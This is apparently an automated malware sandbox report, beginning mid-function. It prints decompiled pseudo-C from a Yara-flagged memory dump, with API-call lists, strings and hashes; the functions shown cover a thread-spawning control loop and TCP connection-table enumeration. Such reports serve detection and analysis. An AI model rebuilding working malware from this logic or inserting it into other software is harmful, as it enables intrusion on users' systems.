											_t229 =  *(_t236 + 0x5c) & 0x0000ffff;
											_v549 = _t173;
											__eflags = _t229 - 1;
											if(_t229 != 1) {
												L49:
												__eflags = _t229 - 2;
												if(_t229 != 2) {
													L56:
													_t174 =  *(_t199 + 0x118) * 0x3e8;
													__eflags = _t174;
													Sleep(_t174);
													L57:
													_t218 =  *0x4f068cc; // 0x0
													__eflags = _t218;
													if(_t218 != 0) {
														_t181 =  *((intOrPtr*)(_t218 + 4));
														__eflags =  *(_t181 + 4);
														if( *(_t181 + 4) != 0) {
															 *((char*)(_t218 + 1)) = 0;
															E04EBA290(_t218, _t218);
															 *0x4f068cc = 0;
														}
													}
													_t254 = _v549;
													__eflags = _t254;
													if(__eflags == 0) {
														goto L7;
													} else {
														_t219 =  *(_t236 + 0x20);
														 *(_t236 + 0x44) = 1;
														__eflags = _t219;
														if(_t219 != 0) {
															L64:
															 *((intOrPtr*)( *_t219 + 4))();
															L65:
															CloseHandle(_t254);
															SetErrorMode(0);
															_t179 = _v529;
															__eflags = _t179;
															if(_t179 != 0) {
																CloseHandle(_t179);
															}
															L69:
															__eflags = _v8 ^ _t260;
															return E04ED572E(_v8 ^ _t260);
														}
														_t220 =  *(_t236 + 0x24);
														__eflags = _t220;
														if(_t220 == 0) {
															goto L65;
														}
														_t219 = _t220 + 4;
														__eflags = _t219;
														goto L64;
													}
												}
												_t221 =  *(_t236 + 0x24);
												__eflags = _t221;
												if(_t221 == 0) {
													goto L56;
												}
												_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t221 + 4)) + 0x40))();
												__eflags = _t184;
												if(_t184 == 0) {
													goto L56;
												}
												__eflags =  *(_t236 + 0x48);
												L53:
												if(__eflags == 0) {
													goto L56;
												}
												goto L54;
											}
											_t223 =  *(_t236 + 0x20);
											__eflags = _t223;
											if(_t223 == 0) {
												goto L49;
											}
											__eflags =  *((intOrPtr*)( *_t223 + 0x40))();
											goto L53;
											L54:
											Sleep(0x1f4);
											__eflags = _v549;
										} while (_v549 == 0);
										goto L57;
									}
									L38:
									_t135 = _t135 + 1;
									_v544 = _t135;
								} while (_t135 < 2);
							}
							_t245 = _v548 + 1;
							_v548 = _t245;
						} while (_t245 < (_v320 & 0x0000ffff) + 1);
						break;
					}
					L40:
					Sleep(0x2710);
					goto L7;
				}
			}


































































                                                                                    0x04ecb280
                                                                                    0x04ecb280
                                                                                    0x04ecb286
                                                                                    0x04ecb28c
                                                                                    0x04ecb293
                                                                                    0x04ecb29a
                                                                                    0x04ecb29b
                                                                                    0x04ecb29c
                                                                                    0x04ecb29d
                                                                                    0x04ecb2ab
                                                                                    0x04ecb2b3
                                                                                    0x04ecb2b5
                                                                                    0x04ecb2bd
                                                                                    0x04ecb2c7
                                                                                    0x04ecb7cc
                                                                                    0x04ecb7d0
                                                                                    0x04ecb7d2
                                                                                    0x04ecb7d5
                                                                                    0x04ecb7d5
                                                                                    0x00000000
                                                                                    0x04ecb2dc
                                                                                    0x04ecb2de
                                                                                    0x04ecb2ea
                                                                                    0x04ecb2fd
                                                                                    0x04ecb309
                                                                                    0x04ecb30c
                                                                                    0x04ecb30e
                                                                                    0x04ecb328
                                                                                    0x04ecb331
                                                                                    0x04ecb345
                                                                                    0x04ecb345
                                                                                    0x04ecb331
                                                                                    0x04ecb347
                                                                                    0x04ecb34e
                                                                                    0x04ecb350
                                                                                    0x04ecb360
                                                                                    0x04ecb360
                                                                                    0x04ecb373
                                                                                    0x04ecb373
                                                                                    0x04ecb375
                                                                                    0x04ecb377
                                                                                    0x04ecb379
                                                                                    0x04ecb37d
                                                                                    0x04ecb382
                                                                                    0x04ecb387
                                                                                    0x04ecb38c
                                                                                    0x04ecb38c
                                                                                    0x04ecb395
                                                                                    0x04ecb3a5
                                                                                    0x04ecb3a5
                                                                                    0x04ecb3a7
                                                                                    0x04ecb3a7
                                                                                    0x04ecb3b1
                                                                                    0x04ecb3b3
                                                                                    0x04ecb3ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb3c0
                                                                                    0x04ecb3c4
                                                                                    0x04ecb3c6
                                                                                    0x04ecb3ca
                                                                                    0x04ecb3cf
                                                                                    0x04ecb3d4
                                                                                    0x04ecb3d7
                                                                                    0x04ecb3dc
                                                                                    0x04ecb3dc
                                                                                    0x04ecb3df
                                                                                    0x04ecb3e6
                                                                                    0x04ecb3ed
                                                                                    0x04ecb3f4
                                                                                    0x04ecb3fb
                                                                                    0x04ecb402
                                                                                    0x04ecb407
                                                                                    0x04ecb40a
                                                                                    0x04ecb40f
                                                                                    0x04ecb40f
                                                                                    0x04ecb412
                                                                                    0x04ecb415
                                                                                    0x04ecb41a
                                                                                    0x04ecb41d
                                                                                    0x04ecb41f
                                                                                    0x04ecb41f
                                                                                    0x04ecb425
                                                                                    0x04ecb42d
                                                                                    0x04ecb42f
                                                                                    0x04ecb42f
                                                                                    0x04ecb433
                                                                                    0x04ecb46e
                                                                                    0x04ecb473
                                                                                    0x00000000
                                                                                    0x04ecb435
                                                                                    0x04ecb435
                                                                                    0x04ecb437
                                                                                    0x04ecb440
                                                                                    0x04ecb440
                                                                                    0x04ecb445
                                                                                    0x04ecb448
                                                                                    0x04ecb450
                                                                                    0x04ecb476
                                                                                    0x04ecb476
                                                                                    0x04ecb478
                                                                                    0x04ecb480
                                                                                    0x04ecb480
                                                                                    0x04ecb489
                                                                                    0x04ecb48c
                                                                                    0x04ecb490
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb496
                                                                                    0x04ecb49a
                                                                                    0x04ecb4a2
                                                                                    0x04ecb4a6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb4b6
                                                                                    0x04ecb4bb
                                                                                    0x04ecb4c1
                                                                                    0x04ecb4c6
                                                                                    0x04ecb4cf
                                                                                    0x04ecb4d6
                                                                                    0x04ecb4dd
                                                                                    0x04ecb4e4
                                                                                    0x04ecb4eb
                                                                                    0x04ecb4f2
                                                                                    0x04ecb4fa
                                                                                    0x04ecb501
                                                                                    0x04ecb508
                                                                                    0x04ecb50f
                                                                                    0x04ecb516
                                                                                    0x04ecb51a
                                                                                    0x04ecb51f
                                                                                    0x04ecb529
                                                                                    0x04ecb52c
                                                                                    0x04ecb538
                                                                                    0x04ecb539
                                                                                    0x04ecb53c
                                                                                    0x04ecb541
                                                                                    0x04ecb543
                                                                                    0x04ecb656
                                                                                    0x04ecb656
                                                                                    0x00000000
                                                                                    0x04ecb656
                                                                                    0x04ecb556
                                                                                    0x04ecb55f
                                                                                    0x04ecb561
                                                                                    0x04ecb56a
                                                                                    0x04ecb57a
                                                                                    0x04ecb57e
                                                                                    0x04ecb584
                                                                                    0x04ecb587
                                                                                    0x04ecb590
                                                                                    0x04ecb59b
                                                                                    0x04ecb59e
                                                                                    0x04ecb5a5
                                                                                    0x04ecb5ac
                                                                                    0x04ecb5bf
                                                                                    0x04ecb5c5
                                                                                    0x04ecb5ca
                                                                                    0x04ecb5d1
                                                                                    0x04ecb5d5
                                                                                    0x04ecb5df
                                                                                    0x04ecb5e9
                                                                                    0x04ecb5f0
                                                                                    0x04ecb5f3
                                                                                    0x04ecb5f5
                                                                                    0x04ecb5f9
                                                                                    0x04ecb5fe
                                                                                    0x04ecb608
                                                                                    0x04ecb608
                                                                                    0x04ecb614
                                                                                    0x04ecb625
                                                                                    0x04ecb62a
                                                                                    0x04ecb62f
                                                                                    0x00000000
                                                                                    0x04ecb631
                                                                                    0x04ecb631
                                                                                    0x04ecb633
                                                                                    0x04ecb641
                                                                                    0x04ecb647
                                                                                    0x04ecb64b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb654
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb654
                                                                                    0x04ecb692
                                                                                    0x04ecb694
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb696
                                                                                    0x04ecb698
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb69a
                                                                                    0x04ecb69f
                                                                                    0x04ecb6a7
                                                                                    0x04ecb6a9
                                                                                    0x04ecb6ad
                                                                                    0x04ecb6b2
                                                                                    0x04ecb6b5
                                                                                    0x04ecb6b7
                                                                                    0x04ecb6bc
                                                                                    0x04ecb6bc
                                                                                    0x04ecb6c4
                                                                                    0x04ecb6c8
                                                                                    0x04ecb6cd
                                                                                    0x04ecb6db
                                                                                    0x04ecb6dd
                                                                                    0x04ecb6de
                                                                                    0x04ecb6f0
                                                                                    0x04ecb6ff
                                                                                    0x04ecb705
                                                                                    0x04ecb709
                                                                                    0x04ecb70d
                                                                                    0x04ecb710
                                                                                    0x04ecb722
                                                                                    0x04ecb722
                                                                                    0x04ecb725
                                                                                    0x04ecb751
                                                                                    0x04ecb751
                                                                                    0x04ecb751
                                                                                    0x04ecb75c
                                                                                    0x04ecb75e
                                                                                    0x04ecb75e
                                                                                    0x04ecb764
                                                                                    0x04ecb766
                                                                                    0x04ecb768
                                                                                    0x04ecb76b
                                                                                    0x04ecb76f
                                                                                    0x04ecb772
                                                                                    0x04ecb776
                                                                                    0x04ecb77b
                                                                                    0x04ecb77b
                                                                                    0x04ecb76f
                                                                                    0x04ecb785
                                                                                    0x04ecb789
                                                                                    0x04ecb78b
                                                                                    0x00000000
                                                                                    0x04ecb791
                                                                                    0x04ecb791
                                                                                    0x04ecb794
                                                                                    0x04ecb79b
                                                                                    0x04ecb79d
                                                                                    0x04ecb7a9
                                                                                    0x04ecb7ab
                                                                                    0x04ecb7ae
                                                                                    0x04ecb7b5
                                                                                    0x04ecb7b9
                                                                                    0x04ecb7bf
                                                                                    0x04ecb7c3
                                                                                    0x04ecb7c5
                                                                                    0x04ecb7c8
                                                                                    0x04ecb7c8
                                                                                    0x04ecb7db
                                                                                    0x04ecb7e7
                                                                                    0x04ecb7f1
                                                                                    0x04ecb7f1
                                                                                    0x04ecb79f
                                                                                    0x04ecb7a2
                                                                                    0x04ecb7a4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb7a6
                                                                                    0x04ecb7a6
                                                                                    0x00000000
                                                                                    0x04ecb7a6
                                                                                    0x04ecb78b
                                                                                    0x04ecb727
                                                                                    0x04ecb72a
                                                                                    0x04ecb72c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb734
                                                                                    0x04ecb737
                                                                                    0x04ecb739
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb73b
                                                                                    0x04ecb73f
                                                                                    0x04ecb73f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb73f
                                                                                    0x04ecb712
                                                                                    0x04ecb715
                                                                                    0x04ecb717
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb71e
                                                                                    0x00000000
                                                                                    0x04ecb741
                                                                                    0x04ecb746
                                                                                    0x04ecb748
                                                                                    0x04ecb748
                                                                                    0x00000000
                                                                                    0x04ecb74f
                                                                                    0x04ecb65a
                                                                                    0x04ecb65a
                                                                                    0x04ecb65b
                                                                                    0x04ecb65f
                                                                                    0x04ecb480
                                                                                    0x04ecb674
                                                                                    0x04ecb676
                                                                                    0x04ecb67a
                                                                                    0x00000000
                                                                                    0x04ecb3c4
                                                                                    0x04ecb682
                                                                                    0x04ecb687
                                                                                    0x00000000
                                                                                    0x04ecb687

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                      • Part of subcall function 04EC9360: wsprintfW.USER32 ref: 04EC939E
                                                                                      • Part of subcall function 04EC9360: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                      • Part of subcall function 04EC9360: GetLastError.KERNEL32 ref: 04EC93C1
                                                                                      • Part of subcall function 04EC9360: CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 04ECB2DE
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB2EA
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB2ED
                                                                                    • wsprintfA.USER32 ref: 04ECB2FD
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECBCE0,00000000,00000000,00000000), ref: 04ECB325
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB328
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EBE6B0,00000000,00000000,00000000), ref: 04ECB342
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB345
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB51F
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB549
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04ECB58A
                                                                                    • lstrcpyA.KERNEL32(0000000C,?), ref: 04ECB5AC
                                                                                    • lstrcpyW.KERNEL32 ref: 04ECB5BF
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECB641
                                                                                    • Sleep.KERNEL32(00002710,Control), ref: 04ECB687
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 04ECB6FF
                                                                                    • Sleep.KERNEL32(000001F4), ref: 04ECB746
                                                                                    • Sleep.KERNEL32(?), ref: 04ECB75C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ECB7B5
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 04ECB7B9
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ECB7C8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB7D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CountCreateSleepTick$ErrorEvent$ModeThreadlstrcpywsprintf$AllocateCheckFreeInitializeLastMembershipOpenToken
                                                                                    • String ID: 20211002$Control$Global\%d%d$v2021002
                                                                                    • API String ID: 621048162-1793688938
                                                                                    • Opcode ID: a70baead9bcbb5d9cb9fce250190fc5d7b4d12517bda983ec04a6e757508fa12
                                                                                    • Instruction ID: 6832ab6bed5762918345aa236ac4b7d22642ad05a8ebb73071a8423ff7106238
                                                                                    • Opcode Fuzzy Hash: a70baead9bcbb5d9cb9fce250190fc5d7b4d12517bda983ec04a6e757508fa12
                                                                                    • Instruction Fuzzy Hash: 79E1B370604301AFE724DF64E985BABB7E4FF84708F04152CE9459B280EBB5F855CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBD550, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 289memorystringlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 65%
                                                                                    			E04EBD550(void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v16;
				short _v540;
				void* _v544;
				void* _v548;
				void* _v552;
				long _v556;
				signed int* _v560;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				_Unknown_base(*)() _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				void* _v604;
				signed int _t97;
				_Unknown_base(*)()* _t102;
				signed int _t108;
				void* _t109;
				void* _t111;
				int _t125;
				signed int _t133;
				void* _t135;
				void* _t137;
				void* _t143;
				signed int* _t144;
				signed int* _t148;
				int _t161;
				signed int _t169;
				signed int* _t178;
				intOrPtr _t179;
				long _t180;
				_Unknown_base(*)()* _t184;
				intOrPtr _t185;
				long _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				struct HINSTANCE__* _t195;
				signed int _t197;
				void* _t199;
				signed int* _t201;
				void* _t202;
				long _t204;
				void* _t208;
				void* _t211;
				signed int _t215;
				void* _t219;
				signed int _t222;
				void* _t223;
				void* _t228;
				void* _t231;
				void* _t233;

				_t222 = (_t219 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t219 + 4));
				_t215 = _t222;
				_t223 = _t222 - 0x258;
				_t97 =  *0x4f03008; // 0x3d21fb31
				_v16 = _t97 ^ _t215;
				_push(__esi);
				_t204 = 0;
				_t195 = LoadLibraryA("iphlpapi.dll");
				if(_t195 == 0) {
					L5:
					return E04ED572E(_v16 ^ _t215);
				} else {
					_v604 = 0;
					_v600 = 1;
					_t102 = GetProcAddress(_t195, "GetExtendedTcpTable");
					_v548 = _t102;
					if(_t102 == 0) {
						_t197 = GetProcAddress(_t195, "AllocateAndGetTcpExTableFromStack");
						__eflags = _t197;
						if(_t197 == 0) {
							__eflags = 0;
							goto L24;
						} else {
							_v544 = 0;
							_t108 =  *_t197( &_v544, 1, GetProcessHeap(), 0, 2);
							__eflags = _t108;
							if(_t108 == 0) {
								_t109 = LocalAlloc(0x40, 0x2800);
								_t178 = _v544;
								_t199 = _t109;
								_v548 = 0;
								__eflags =  *_t178;
								if( *_t178 > 0) {
									_t188 = 0;
									_v552 = 0;
									asm("o16 nop [eax+eax]");
									do {
										_v596 =  *((intOrPtr*)(_t188 +  &(_t178[2])));
										_v592 =  *((intOrPtr*)(_t188 +  &(_t178[3])));
										_v588 =  *((intOrPtr*)(_t188 +  &(_t178[4])));
										_v584 =  *((intOrPtr*)(_t188 +  &(_t178[5])));
										_t179 =  *((intOrPtr*)(_t188 +  &(_t178[6])));
										_push(_t179);
										_v580 =  *((intOrPtr*)(_t188 +  &(_t178[1])));
										_v576 = _t179;
										E04EBD4B0(_t179,  &_v540);
										_t228 = _t223 + 4;
										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
										_t125 = LocalSize(_t199);
										_t180 = _v556;
										__eflags = _t125 - _t180;
										if(_t125 < _t180) {
											_t199 = LocalReAlloc(_t199, _t180, 0x42);
										}
										asm("movups xmm0, [ebp-0x250]");
										asm("movups [esi+edi], xmm0");
										asm("movups xmm0, [ebp-0x240]");
										asm("movups [esi+edi+0x10], xmm0");
										_t208 = _t204 + 0x20;
										E04EDDC90(_t208 + _t199,  &_v540, 2 + lstrlenW( &_v540) * 2);
										_t223 = _t228 + 0xc;
										_t133 = lstrlenW( &_v540);
										_t178 = _v544;
										_t188 = _v552 + 0x18;
										_v552 = _t188;
										_t204 = _t208 + _t133 * 2 + 2;
										_t135 = _v548 + 1;
										_v548 = _t135;
										__eflags = _t135 -  *_t178;
									} while (_t135 <  *_t178);
								}
								LocalReAlloc(_t199, _t204, 0x42);
								_t111 = _v544;
								__eflags = _t111;
								if(_t111 != 0) {
									HeapFree(GetProcessHeap(), 0, _t111);
								}
								goto L24;
							} else {
								_t137 = _v544;
								__eflags = _t137;
								if(_t137 == 0) {
									goto L5;
								} else {
									HeapFree(GetProcessHeap(), 0, _t137);
									__eflags = _v16 ^ _t215;
									return E04ED572E(_v16 ^ _t215);
								}
							}
						}
					} else {
						_v544 = 0;
						_t143 =  *_t102(0,  &_v544, 1, 2, 5, 0);
						_t237 = _t143 - 0x7a;
						if(_t143 != 0x7a) {
							goto L5;
						} else {
							_push(_v544);
							_t144 = E04ED5785( &_v544, 0, _t237);
							_t231 = _t223 + 4;
							_t201 = _t144;
							_v560 = _t201;
							_push(0);
							_push(5);
							_push(2);
							_push(1);
							_push( &_v544);
							_push(_t201);
							if(_v548() == 0) {
								_t202 = LocalAlloc(0x40, 0x2800);
								_v552 = 0;
								_t148 = _v560;
								__eflags =  *_t148;
								if( *_t148 > 0) {
									_t184 =  &(_t148[3]);
									_v548 = _t184;
									asm("o16 nop [eax+eax]");
									do {
										_v596 =  *((intOrPtr*)(_t184 - 4));
										_v592 =  *_t184;
										_v588 =  *((intOrPtr*)(_t184 + 4));
										_v584 =  *((intOrPtr*)(_t184 + 8));
										_t185 =  *((intOrPtr*)(_t184 + 0xc));
										_push(_t185);
										_v580 =  *((intOrPtr*)(_t184 - 8));
										_v576 = _t185;
										E04EBD4B0(_t185,  &_v540);
										_t233 = _t231 + 4;
										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
										_t161 = LocalSize(_t202);
										_t186 = _v556;
										__eflags = _t161 - _t186;
										if(_t161 < _t186) {
											_t202 = LocalReAlloc(_t202, _t186, 0x42);
										}
										asm("movups xmm0, [ebp-0x250]");
										asm("movups [esi+edi], xmm0");
										asm("movups xmm0, [ebp-0x240]");
										asm("movups [esi+edi+0x10], xmm0");
										_t211 = _t204 + 0x20;
										E04EDDC90(_t211 + _t202,  &_v540, 2 + lstrlenW( &_v540) * 2);
										_t231 = _t233 + 0xc;
										_t169 = lstrlenW( &_v540);
										_t193 = _v552 + 1;
										_t184 = _v548 + 0x18;
										_v552 = _t193;
										_v548 = _t184;
										_t204 = _t211 + _t169 * 2 + 2;
										__eflags = _t193 -  *_v560;
									} while (_t193 <  *_v560);
								}
								_v556 = LocalReAlloc(_t202, _t204, 0x42);
								E04ED573F(_v560);
								L24:
								__eflags = _v16 ^ _t215;
								return E04ED572E(_v16 ^ _t215);
							} else {
								E04ED573F(_t201);
								goto L5;
							}
						}
					}
				}
			}
























































                                                                                    0x04ebd559
                                                                                    0x04ebd560
                                                                                    0x04ebd564
                                                                                    0x04ebd566
                                                                                    0x04ebd56c
                                                                                    0x04ebd573
                                                                                    0x04ebd576
                                                                                    0x04ebd57d
                                                                                    0x04ebd585
                                                                                    0x04ebd589
                                                                                    0x04ebd609
                                                                                    0x04ebd61d
                                                                                    0x04ebd58b
                                                                                    0x04ebd591
                                                                                    0x04ebd597
                                                                                    0x04ebd5a1
                                                                                    0x04ebd5a7
                                                                                    0x04ebd5af
                                                                                    0x04ebd781
                                                                                    0x04ebd783
                                                                                    0x04ebd785
                                                                                    0x04ebd93c
                                                                                    0x00000000
                                                                                    0x04ebd78b
                                                                                    0x04ebd78f
                                                                                    0x04ebd7a5
                                                                                    0x04ebd7a7
                                                                                    0x04ebd7a9
                                                                                    0x04ebd7e6
                                                                                    0x04ebd7ec
                                                                                    0x04ebd7f2
                                                                                    0x04ebd7f4
                                                                                    0x04ebd7fa
                                                                                    0x04ebd7fc
                                                                                    0x04ebd802
                                                                                    0x04ebd804
                                                                                    0x04ebd80a
                                                                                    0x04ebd810
                                                                                    0x04ebd814
                                                                                    0x04ebd81e
                                                                                    0x04ebd828
                                                                                    0x04ebd832
                                                                                    0x04ebd83c
                                                                                    0x04ebd846
                                                                                    0x04ebd847
                                                                                    0x04ebd84d
                                                                                    0x04ebd853
                                                                                    0x04ebd858
                                                                                    0x04ebd872
                                                                                    0x04ebd878
                                                                                    0x04ebd87e
                                                                                    0x04ebd884
                                                                                    0x04ebd886
                                                                                    0x04ebd892
                                                                                    0x04ebd892
                                                                                    0x04ebd894
                                                                                    0x04ebd8a2
                                                                                    0x04ebd8a6
                                                                                    0x04ebd8ad
                                                                                    0x04ebd8b2
                                                                                    0x04ebd8ce
                                                                                    0x04ebd8d3
                                                                                    0x04ebd8dd
                                                                                    0x04ebd8e3
                                                                                    0x04ebd8ef
                                                                                    0x04ebd8f5
                                                                                    0x04ebd901
                                                                                    0x04ebd904
                                                                                    0x04ebd905
                                                                                    0x04ebd90b
                                                                                    0x04ebd90b
                                                                                    0x04ebd810
                                                                                    0x04ebd917
                                                                                    0x04ebd91f
                                                                                    0x04ebd925
                                                                                    0x04ebd927
                                                                                    0x04ebd934
                                                                                    0x04ebd934
                                                                                    0x00000000
                                                                                    0x04ebd7ab
                                                                                    0x04ebd7ab
                                                                                    0x04ebd7b1
                                                                                    0x04ebd7b3
                                                                                    0x00000000
                                                                                    0x04ebd7b9
                                                                                    0x04ebd7c4
                                                                                    0x04ebd7d1
                                                                                    0x04ebd7de
                                                                                    0x04ebd7de
                                                                                    0x04ebd7b3
                                                                                    0x04ebd7a9
                                                                                    0x04ebd5b5
                                                                                    0x04ebd5c2
                                                                                    0x04ebd5ca
                                                                                    0x04ebd5cc
                                                                                    0x04ebd5cf
                                                                                    0x00000000
                                                                                    0x04ebd5d1
                                                                                    0x04ebd5d1
                                                                                    0x04ebd5d7
                                                                                    0x04ebd5dc
                                                                                    0x04ebd5df
                                                                                    0x04ebd5e7
                                                                                    0x04ebd5ed
                                                                                    0x04ebd5ee
                                                                                    0x04ebd5f0
                                                                                    0x04ebd5f2
                                                                                    0x04ebd5f4
                                                                                    0x04ebd5f5
                                                                                    0x04ebd5fe
                                                                                    0x04ebd62b
                                                                                    0x04ebd62d
                                                                                    0x04ebd633
                                                                                    0x04ebd639
                                                                                    0x04ebd63b
                                                                                    0x04ebd641
                                                                                    0x04ebd644
                                                                                    0x04ebd64a
                                                                                    0x04ebd650
                                                                                    0x04ebd659
                                                                                    0x04ebd661
                                                                                    0x04ebd66a
                                                                                    0x04ebd673
                                                                                    0x04ebd67c
                                                                                    0x04ebd67f
                                                                                    0x04ebd680
                                                                                    0x04ebd686
                                                                                    0x04ebd68c
                                                                                    0x04ebd691
                                                                                    0x04ebd6ab
                                                                                    0x04ebd6b1
                                                                                    0x04ebd6b7
                                                                                    0x04ebd6bd
                                                                                    0x04ebd6bf
                                                                                    0x04ebd6cb
                                                                                    0x04ebd6cb
                                                                                    0x04ebd6cd
                                                                                    0x04ebd6db
                                                                                    0x04ebd6df
                                                                                    0x04ebd6e6
                                                                                    0x04ebd6eb
                                                                                    0x04ebd707
                                                                                    0x04ebd70c
                                                                                    0x04ebd716
                                                                                    0x04ebd728
                                                                                    0x04ebd729
                                                                                    0x04ebd72c
                                                                                    0x04ebd735
                                                                                    0x04ebd741
                                                                                    0x04ebd744
                                                                                    0x04ebd744
                                                                                    0x04ebd650
                                                                                    0x04ebd75c
                                                                                    0x04ebd762
                                                                                    0x04ebd93e
                                                                                    0x04ebd944
                                                                                    0x04ebd952
                                                                                    0x04ebd600
                                                                                    0x04ebd601
                                                                                    0x00000000
                                                                                    0x04ebd606
                                                                                    0x04ebd5fe
                                                                                    0x04ebd5cf
                                                                                    0x04ebd5af

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBD625
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD69B
                                                                                    • LocalSize.KERNEL32 ref: 04EBD6B1
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBD6C5
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD6EE
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD716
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBD750
                                                                                    • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 04EBD77B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000002), ref: 04EBD795
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBD7C4
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBD7E6
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD862
                                                                                    • LocalSize.KERNEL32 ref: 04EBD878
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBD88C
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD8B5
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD8DD
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBD917
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBD934
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloclstrlen$Heap$AddressFreeProcSize$LibraryLoadProcess
                                                                                    • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                                                    • API String ID: 1916288693-4277049092
                                                                                    • Opcode ID: 21d48f29c57f69d6b81b9ba0502832be0e17ec2c73c6fc91a5dcd2d6f9661c9b
                                                                                    • Instruction ID: 74456b33af37cae6c6b769c9cfdcba17702705af336a047731601bdf186cc5c2
                                                                                    • Opcode Fuzzy Hash: 21d48f29c57f69d6b81b9ba0502832be0e17ec2c73c6fc91a5dcd2d6f9661c9b
                                                                                    • Instruction Fuzzy Hash: ABC18075D402199BDB20DF68DC88BEAB7B4EF98305F144599E80DE3241EB74AE81CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC23B0, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 185COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 76%
                                                                                    			E04EC23B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v12;
				short _v144;
				struct tagMONITORINFO _v184;
				struct _devicemodeW _v408;
				signed int _t93;
				struct HICON__* _t96;
				void* _t97;
				void* _t98;
				struct HWND__* _t99;
				struct HMONITOR__* _t102;
				struct HDC__* _t114;
				intOrPtr* _t139;
				intOrPtr _t142;
				signed int _t153;
				void** _t154;
				struct HICON__** _t157;
				void** _t160;
				signed int _t164;

				_t93 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t93 ^ _t164;
				asm("movaps xmm0, [0x4efe8b0]");
				asm("movups [ebp-0x4c], xmm0");
				_push(__ebx);
				asm("movaps xmm0, [0x4efe8a0]");
